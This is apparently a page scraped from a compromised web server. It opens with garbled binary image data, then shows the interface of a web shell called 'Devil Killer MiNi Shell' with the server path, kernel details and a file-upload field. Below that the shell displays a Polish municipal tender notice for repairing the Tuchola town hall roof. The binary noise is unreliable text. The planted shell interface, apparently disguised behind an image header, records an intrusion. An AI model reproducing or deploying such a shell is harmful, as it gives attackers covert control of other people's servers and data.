JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241014/0054437801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Renowacja zabytków położonych w Tucholi przy pl. Zamkowym 1 (Urząd Miejski) (...) - Remont dachu Urzędu Miejskiego w Tucholi </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Tuchola</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092351156</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">plac Zamkowy 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tuchola</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">89-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL618 - Świecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi212@tuchola.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.miasto.tuchola.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Renowacja zabytków położonych w Tucholi przy pl. Zamkowym 1 (Urząd Miejski) (...) - Remont dachu Urzędu Miejskiego w Tucholi </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-610b33a5-8f8e-469e-99e7-bea751863e08</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00544378</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00036928/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.17 Renowacja zabytków położonych w Tucholi przy pl. Zamkowym 1 (Urząd Miejski), ul. Chojnickiej 27 (kamienica mieszkalna) i ul. Świeckiej 58 (cmentarz parafialny), z podziałem na części.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/tuchola <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Adres strony internetowej, na której udostępniane będą zmiany i wyjaśnienia treści<br/>SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia.<br/>W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie pytań,<br/>ofert, zawiadomień, wyjaśnień oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia<br/>będą udostępniane na stronie internetowej zamawiającego: https://platformazakupowa.pl/tuchola (link Profilu Nabywcy).<br/>Szczegółowe informacje zawarto w rozdz. 5 SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">5.8. Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r.<br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (t.j.Dz. U. z 2020 r. poz.<br/>2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego<br/>z zegarem Głównego Urzędu Miar.<br/>5.9. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem:<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view<br/>5.10. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z<br/>platformazakupowa.pl, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania<br/>ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za<br/>ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony<br/>w art. 221 ustawy Pzp.<br/>(...)<br/>5.17. Treść zapytań wraz z wyjaśnieniami Zamawiający udostępnia, bez ujawniania źródła zapytania, na stronie internetowej<br/>prowadzonego postępowania https://platformazakupowa.pl/tuchola, w zakładce „Komunikaty publiczne”.<br/>5.18. Zalecenia Zamawiającego:Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne<br/>z załącznikiem nr 2 do „Rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności,<br/>minimalnychwymagańdlarejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla<br/>systemów<br/>teleinformatycznych”,<br/>zwanego dalej Rozporządzeniem KRI.<br/>5.19. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>5.20. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego<br/>z rozszerzeń:<br/>1) zip<br/>2) 7Z<br/>5.21. Wśród rozszerzeń powszechnych a niewystępujących w rozporządzeniu KRI występują:<br/>.rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>5.22. Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi maksymalnie<br/>10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który<br/>wynosi maksymalnie 5MB.<br/>Szczegółowe informacje zawarto w rozdz. 5 SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/tuchola</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">25.1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina Tuchola, w imieniu której działa Burmistrz Tucholi wykonujący prawem<br/>określone obowiązki z wykorzystaniem aparatu pomocniczego – Urzędu Miejskiego w Tucholi.<br/>Kontakt: Plac Zamkowy 1,89-500 Tuchola, e-mail: burmistrz@tuchola.pl, tel. 52 5642500, fax.: 52 334 21 38.<br/>2) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c) RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego prowadzonym w trybie podstawowym bez negocjacji.<br/>3) Odbiorcami Pani/Pana danych osobowych:<br/>- będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 oraz art.. 253 Ustawy z<br/>dnia 11 września 2019 r. Prawo zamówień publicznych (Dz.U. 2021.1129 ze zm.), dalej „ustawy Pzp”.<br/>- będą upoważnieni pracownicy Administratora Danych Osobowych,<br/>- mogą być podmioty upoważnione na podstawie przepisów prawa oraz podwykonawcy związani z Administratorem Danych<br/>umowami powierzenia przetwarzania danych osobowych.<br/>4) Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 i 4 ustawy Pzp,<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia (a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy), a następnie według kategorii archiwalnej dokumentacji postępowania o<br/>udzielenie zamówienia.<br/>5) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>6) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>7) W związku z jawnością postępowania o udzielenie zamówienia publicznego Pani/Pana dane osobowe mogą być przekazywane<br/>do państw poza EOG z zastrzeżeniem, o którym mowa w art. 18 ust. 5 Ustawy Pzp.<br/>8) Administrator danych osobowych będzie przetwarzał dane osobowe zebrane w postępowaniu o udzielenie zamówienia w sposób<br/>gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.<br/>9) posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących *;<br/>na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;- na podstawie art. 18 RODO prawo żądania<br/>od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2<br/>RODO ***;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">10) nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b), d) lub e) RODO prawo do usunięcia danych osobowych,<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c) RODO,<br/>11) w sprawach z zakresu ochrony danych osobowych można kontaktować się z Inspektorem Ochrony Danych, telefonicznie: 52<br/>336 34 33 lub pod adresem e-mail: iod@tuchola.pl<br/>* Wyjaśnienie: w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia, o<br/>którym mowa w art. 15 ust. 1-3 RODO, Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych<br/>informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.27.2024.AS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1.	Przedmiotem inwestycji jest Renowacja zabytków położonych w Tucholi przy pl. Zamkowym 1 (Urząd Miejski), ul. Chojnickiej 27 (kamienica mieszkalna) i ul. Świeckiej 58 (cmentarz parafialny) - Remont dachu Urzędu Miejskiego w Tucholi”<br/>ZAMAWIAJĄCY ZREZYGNOWAŁ Z REALIZACJI ZAKRESU DOTYCZĄCEGO RENOWACJI CMENTARZA PARAFIALNEGO oraz Renowacja kamienicy mieszkalnej przy ul. Chojnickiej 27 w Tucholi.<br/>Zadanie uzyskało dofinansowanie z Rządowego Programu Odbudowy Zabytków.<br/>Zamawiający zastrzega sobie, że – w wyniku braku dofinansowania ze środków Rządowego Programu Odbudowy Zabytków lub z innych źródeł – zrezygnuje z realizacji zamówienia.<br/>REMONT DACHU URZĘDU MIEJSKIEGO W TUCHOLI – swym zakresem obejmuje roboty budowlane wymienione poniżej.<br/>1.	Remont pokrycia dachowego<br/>1)	Rozbiórka pokrycia z dachówki karpiówki podwójnie wraz z ołatowaniem i deskami okapowymi, wiatrownicami<br/>2)	Wymiana elementów konstrukcyjnych dachu - koniec krokwi.<br/>3)	Montaż wiatrownic impregnowane.<br/>4)	Dwukrotna impregnacja grzybobójcza bali i krawędziaków metodą smarowania preparatami solowymi.<br/>5)	Ułożenie na krokwiach ekranu - membrana o gramaturze minimum 180 g.<br/>6)	Impregnacja, przycięcie i przybicie kontrłat i łat<br/>7)	Pokrycie dachu dachówką ceramiczną karpiówką w koronkę.<br/>8)	Obróbkę szczytów dachów dachówkami szczytowymi karpiówką 1/2<br/>9)	Wykonanie kalenicy w dachu krytym dachówką ceramiczną karpiówką.<br/>10)	Montaż elementów uzupełniających w dachu krytym dachówką ceramiczną – gąsior początkowy, końcowy, łącznik gasiorów, grzebienia z kratką wentylacyjną , kratkę wentylacyjną<br/>11)	Wykonanie i montaż obróbek blacharskich koszy z blachy cynkowo-tytanowej przy dachu krytym dachówką, koszy, pasów nadrynnowych, gzymsów, pasów elewacyjnych<br/>12)	Montaż taśmy wentylacyjnej okapu i kalenicy<br/>13)	Rynny dachowe półokrągłe o śr. 15 cm - z blachy z cynkowo-tytanowej<br/>14)	Rury spustowe okrągłe o śr. 10 cm - z blachy z cynku i z domieszką tytanu<br/>15)	Demontaż przewodów wyrównawczych i odgromowych z linki mocowanych na dachu stromym jak i na ścianach w ciągach pionowych.<br/>16)	Montaż zwodów poziomych instalacji odgromowej nienaprężanych z pręta o średnicy do 10 mm na dachu stromym pokrytym dachówką<br/>17)	Montaż przewodów odprowadzających instalacji odgromowej na budynkach na cegle z wykonaniem otworu ręcznie - bednarka do 120 mm2.<br/>18)	Montaż złączy do rynny okapowej na dachu w instalacji odgromowej lub przewodów wyrównawczych.<br/>19)	Montaż złączy kontrolnych z połączeniem drut-płaskownik w instalacji odgromowej lub przewodów wyrównawczych.<br/>20)	Łączenie pręta o średnicy do 10 mm na dachu za pomocą złączy skręcanych uniwersalnych krzyżowych.<br/>21)	Montaż zwodów pionowych instalacji odgromowej z pręta ocynkowanego o średnicy 18 mm na dachu lub dymniku stromym.<br/>22)	Mechaniczne pogrążanie uziomów pionowych prętowych w gruncie kat. III.<br/>23)	Badania i pomiary instalacji piorunochronnej.<br/>24)	Rozebranie kominów wolnostojących.<br/>25)	Wieloprzewodowe kominy wolno stojące z cegieł klinkierowych pełnych wraz ze spoinowaniem – o przekroju przewodu 1/2x1/2 cegły.<br/>26)	Montaż elementów komunikacji po dachu – ława kominiarska duża.<br/>27)	Montaż elementów komunikacji po dachu – stopień kominiarski stalowy.<br/>28)	Malowanie tynków zewnętrznych farbą silikonową wraz z przygotowaniem podłoża – gzyms pod dachem.<br/>29)	Montaż okna poddaszy połaciowe fabrycznie wykończone o wym. 78 x 98 cm<br/>30)	Wyłazy dachowe fabrycznie wykończone 45 x 73<br/>31)	Wywiezienie gruzu spryzmowanego samochodami skrzyniowymi na odległość 3 km wraz z kosztami utylizacji.<br/>2. Wymiana istniejącej stolarki okiennej <br/>1)	Wykucie z muru i wstawienie nowych okien zespolonych – z drewna klejonego rozwierne z plus szprosa tak jak istniejące okna – wraz z obróbką ościeży i pomalowaniem ościeży – okna dwuszybowe (pomieszczenia poddasza nieogrzewane),<br/>2)	Wykucie z muru i wstawienie nowych okien zespolonych z drewna klejonego rozwierne z plus szprosa – okrągłych kołowych – wraz z obróbką ościeży i pomalowaniem ościeży – okna dwuszybowe (pomieszczenia poddasza nieogrzewane).<br/>Szczegółowy opis przedmiotu zamówienia zawierają niżej wymienione dokumenty:<br/>- Opis planowanych robót – Remont części dachu i stolarki okiennej na budynku Urzędu Miejskiego w Tucholi,<br/>- Specyfikacje techniczne wykonania i odbioru robót budowlanych – Remont części dachu i stolarki okiennej na budynku Urzędu Miejskiego w Tucholi.<br/>Pomocniczo Zamawiający udostępnia przedmiary robót:<br/>- Przedmiar – Remont części dachu i stolarki okiennej na budynku Urzędu Miejskiego w Tucholi.<br/><br/>3.2.	Zamawiający wymaga, by czynności bezpośrednio związane z realizacją robót budowlanych, w ramach zamówienia, wykonywane były przez osoby zatrudnione przez Wykonawcę na podstawie umowy o pracę w rozumieniu ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (t.j. Dz. U. z 2022 r. poz. 1510, ze zm.), o ile nie są one wykonywane przez dane osoby osobiście w ramach prowadzonej przez nie na podstawie wpisu do CEIDG działalności gospodarczej.<br/>Wymóg zatrudnienia na umowę o pracę nie dotyczy osób kierujących budową i robotami, osób wykonujących usługi projektowe, geodezyjne oraz osób świadczących usługi transportowe i sprzętowe.<br/>Zatrudnienie na podstawie umowy o prace wyżej wymienionych osób powinno trwać nieprzerwanie przez cały okres trwania umowy.<br/>Wykonawca zobowiązany jest do przedłożenia Zamawiającemu w terminie określonym zapisami umowy i aktualizowania na bieżąco, tj. za każdym razem, gdy dojdzie do zmiany personalnej, wykazu osób biorących udział w realizacji zamówienia zatrudnionych na podstawie umowy o pracę.<br/>Wykaz osób zatrudnionych na podstawie umowy o pracę biorących udział w realizacji zamówienia musi zawierać pełny skład pracowników wraz z określeniem pełnionych przez nich funkcji i wskazaniem okresu obowiązywania umowy o pracę.<br/>3.3.	Wykonawca przed przystąpieniem do wykonywania robót:<br/>- najpóźniej w dniu przekazania terenu budowy, złoży wykaz osób oddelegowanych do realizacji zamówienia wraz z oświadczeniem o tym, że są zatrudnieni na podstawie umowy o pracę;<br/>- wskaże osoby funkcyjne budowy, wraz ze złożonymi przez nie oświadczeniami o podjęciu obowiązków kierownika budowy i robót;<br/>- przedstawi Zamawiającemu szczegółową specyfikację materiałową wraz informacjami o wyrobach (deklaracjami zgodności), za wyjątkiem kostki brukowej i obrzeży – w celu zatwierdzenia przez inspektora nadzoru.<br/>3.4.	Wykonawca, który będzie realizował przedmiotową inwestycję, zobowiązany będzie udzielić Zamawiającemu minimum 36 miesięcy gwarancji na wykonane roboty budowlane.<br/>3.5.	Mimo, iż rozliczenie zadania jest ryczałtowe, Zamawiający wymaga, aby Wykonawca wybrany w niniejszym postępowaniu dostarczył kosztorysy ofertowe i powykonawcze – na potrzeby rozliczenia inwestycji przez Zamawiającego, wraz z zakresem rzeczowym wykonanych robót.<br/>Ewentualne zmiany, które wystąpią w kosztorysie powykonawczym, w stosunku do kosztorysu ofertowego, należy szczegółowo opisać w zakresie merytorycznym, obmiarowym i kosztowym.<br/>Pomocniczo Zamawiający udostępnia przedmiar robót stanowiący kosztorys ofertowy służący do przygotowania oferty, które Wykonawca złoży najpóźniej w dniu podpisania umowy. Ewentualne zmiany, które wystąpią w kosztorysie powykonawczym, w stosunku do kosztorysu ofertowego, należy szczegółowo opisać w zakresie merytorycznym, obmiarowym i kosztowym.<br/>3.6.	Sposób rozliczenia z Wykonawcą<br/>Strony postanawiają, że rozliczenie za przedmiot umowy będzie następowało w II transzach:<br/>- I transza – w formie zaliczki w kwocie nie mniejszej niż 2% 